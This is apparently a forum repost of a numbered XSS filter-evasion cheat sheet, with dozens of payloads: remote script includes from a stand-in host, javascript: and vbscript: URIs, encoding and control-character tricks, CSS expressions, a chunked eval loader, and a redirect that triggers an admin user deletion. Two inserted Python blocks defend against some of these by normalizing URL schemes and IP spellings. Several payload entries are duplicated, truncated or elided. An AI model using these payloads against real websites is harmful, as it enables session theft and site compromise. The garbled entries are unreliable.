t00ls seems to have relatively little material on XSS, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically ineffective in China, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
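Items 3 through 19 are all the same javascript: scheme spelled differently (case, decimal and hex character references with and without semicolons, embedded tab/newline/CR, NUL bytes, leading whitespace). The defender's counterpart, added here as an example that is not part of the original post, decodes and strips those spellings before checking the scheme against an allow-list; the SAFE_SCHEMES set and the EVASIONS/BENIGN vectors are constructed for the demonstration.

```python
import html
import re

# Schemes a user-supplied link or image source may carry; javascript:, vbscript:
# and data: are not among them, so they are rejected (constructed allow-list).
SAFE_SCHEMES = frozenset({"http", "https", "mailto"})
# NUL, tab, LF, CR and space: bytes browsers have historically ignored inside
# a scheme (items 11-14, 17 and 19 above).
_CONTROLS = re.compile(r"[\x00-\x20]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):")

def naive_blocks(url: str) -> bool:
    """The sort of check the list above defeats: a literal prefix match."""
    return url.startswith("javascript:")

def normalize_url(raw: str) -> str:
    """Collapse the encodings of items 3-19 into one canonical spelling."""
    s = raw
    for _ in range(3):  # bounded: undo double-encoded character references
        decoded = html.unescape(s)  # &#106; &#0000106 &#x6A, with or without ';'
        if decoded == s:
            break
        s = decoded
    return _CONTROLS.sub("", s)  # drop embedded NUL/tab/CR/LF and leading spaces

def scheme_of(url: str) -> str:
    """Lower-case scheme of the normalized URL, or '' for a relative URL."""
    m = _SCHEME.match(normalize_url(url).lower())
    return m.group(1) if m else ""

def is_safe_url(raw: str) -> bool:
    """Fail closed: only relative URLs and allow-listed schemes pass."""
    scheme = scheme_of(raw)
    return scheme == "" or scheme in SAFE_SCHEMES

# Constructed vectors modelled on the IMG SRC spellings of items 3-19 and 40.
EVASIONS = [
    "javascript:alert('XSS')",                      # (3) plain
    "JaVaScRiPt:alert('XSS')",                      # (4) mixed case
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # (5)
    "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",  # (9)
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",  # (10) hex
    "jav\tascript:alert('XSS')",                    # (11) embedded tab
    "jav&#x0A;ascript:alert('XSS')",                # (13) encoded newline
    "java\0script:alert('XSS')",                    # (17) NUL byte
    " javascript:alert('XSS')",                     # (19) leading space
    "vbscript:msgbox('XSS')",                       # (40) another script scheme
]
BENIGN = ["http://example.com/a.jpg", "/images/a.jpg", "https://example.com/?q=a:b"]
```

The naive prefix check catches only the first vector; the normalizing check rejects all of them while passing the benign URLs.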
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the escape filter in JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image plus extra characters (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (consisting of an open angle bracket and a leading letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG via STYLE
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be slipped in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can add JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Getting around symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP address in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
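Items 70 through 76 rely on hosts that a string-comparing allow-list treats as different but a browser resolves to the same address: decimal, hex and octal IP literals, tabs and newlines inside the URL, and a trailing dot. Added here as an example that is not part of the original post: a canonicalizer that applies the legacy inet_aton() reading of dotted parts before comparing against an allow-list; the allow-lists in the checks are constructed.

```python
import ipaddress
import re
from typing import Optional, Set
from urllib.parse import urlsplit

# One dotted part as legacy inet_aton() reads it: 0x... is hex, a leading 0 is octal, else decimal.
_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$")

def _part_value(p: str) -> int:
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)

def canonical_ipv4(host: str) -> Optional[str]:
    """Dotted quad for any inet_aton-style literal (items 70-73); None if host is not one."""
    parts = host.lower().split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    vals = [_part_value(p) for p in parts]
    tail_bytes = 5 - len(vals)  # the last part fills all remaining bytes
    if any(v > 255 for v in vals[:-1]) or vals[-1] >= 256 ** tail_bytes:
        return None
    n = 0
    for v in vals[:-1]:
        n = (n << 8) | v
    n = (n << (8 * tail_bytes)) | vals[-1]
    return str(ipaddress.IPv4Address(n))

def is_host_allowed(url: str, allowed_hosts: Set[str]) -> bool:
    """Allow-list check that sees through the host spellings of items 70-76."""
    cleaned = re.sub(r"[\t\r\n]", "", url)  # browsers drop these before parsing (item 73)
    host = (urlsplit(cleaned).hostname or "").rstrip(".")  # trailing dot, item 76
    host = canonical_ipv4(host) or host
    allowed = {canonical_ipv4(h.lower()) or h.lower().rstrip(".") for h in allowed_hosts}
    return host in allowed
```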